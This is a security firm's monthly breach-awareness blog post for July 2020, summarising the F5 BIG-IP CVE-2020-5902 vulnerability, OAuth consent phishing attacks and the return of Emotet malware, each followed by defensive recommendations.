A Month In Breaches: July

This is an initiative by our Security Operations Centre team who have their eyes on the prize 24/7 and are proactively observing breaches and critical security trends.

Part of protecting our clients is also promoting good security practices and raising awareness of current security trends. We hope this will give some extra boost to your overall understanding of security breaches happening in the expansive and scary internet.

F5 BIG IP VULNERABILITY CVE-2020-5902

The Traffic Management User Interface (TMUI) of F5 Big IP has a Remote Code Execution (RCE) vulnerability in undisclosed pages. This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. It can also result in a full system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.  Please check the source below to find vulnerable versions.

Researchers said that as of July 15, there were at least 8,041 vulnerable TMUI instances still exposed to the public internet. To ensure that your version of F5 Big IP is secure, CTRL Group recommends installing the patched version immediately. This will eliminate the vulnerability. If installing a patch is not possible, block all access to the Configuration utility of your BIG-IP system using self IPs. In addition, you should permit management access to F5 products only over a secure network. Further alternates can be found in the link provided in the source below.

MICROSOFT OAUTH ATTACKS AGAINST CLOUD APP USERS

OAuth is an open standard for access delegation. It is generally used as a way for people to sign into services without entering a password. The most evident instance might be the “Sign in with Google” or “Sign in with Facebook” that many websites uses. These “Sign in” or “Log in” prompts are called consent prompts. According to Microsoft, a type of application-based attack is on rise that take advantage of OAuth authentication. These attacks are categorised as Consent Phishing. Instead of stealing passwords, this attack focusses on seeking permission for an attacker-controlled application to access sensitive information. It begins by registering a malicious app with an OAuth2 provider. This application looks and feels trustworthy but in reality, it’s not. Link of this application is then distributed using conventional phishing methods such as emails. If a user clicks accept, they will grant the bad app permissions to access their credentials and potentially other sensitive data.

It might feel like an extra step but ensuring the legitimacy of the application you are signing into, could protect you from these spiking attacks. Attackers spoofs app names and make it look genuine, so always make sure you recognize app name and URL before you commit consenting to it. These times are especially critical because of the global pandemic we are facing. People working from home are making more use of cloud-based apps and authenticating to them via OAuth. If the organisations and its employees are trained well to be more diligent in their actions, it can prove to be highly valuable for the security of sensitive data.

EMOTET MALWARE

Emotet malware threat has resurfaced after a five-month hiatus, with more than 250,000 malspam messages being sent to email recipients worldwide. Emotet is a Trojan that is primarily spread through spam emails. The infection may arrive either via a malicious script, document files, or malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. For instance, there is an email containing a word document called “Invoice – 24 Jul, 2020.doc”. The document contains a script that asks recipients to enable it. Once the script launched, it will generate PowerShell scripts to download Emotet malware from remote malicious websites. It can steal data, such as user credentials stored on the browser, by eavesdropping on network traffic. Once Emotet has infected a network machine, it will propagate by enumerating network resources and write to share drives as well as brute force user accounts.

To protect from Emotet, patch any unsecured machines, and ensure everything has the lastest endpoint protection, then you can dramatically reduce the risk of infection. Also, it is safe to double-check the email sender and be cautious in opening up the links and attached files. There is a recommendation if you suspect that one of the machines in the network is infected by Emotet. First, disconnect the infected machines from the network immediately. Second, run a virus scan and patch for Eternal Blue as Emotet drops Trcikbot which uses Eternal Blue to propagate. Last, disable administrative shares and change account credentials. More information can be found on the following link.

 

 

– CTRL GROUP SECURITY OPERATIONS CENTRE ANALYSTS, M-Singh & V-MSK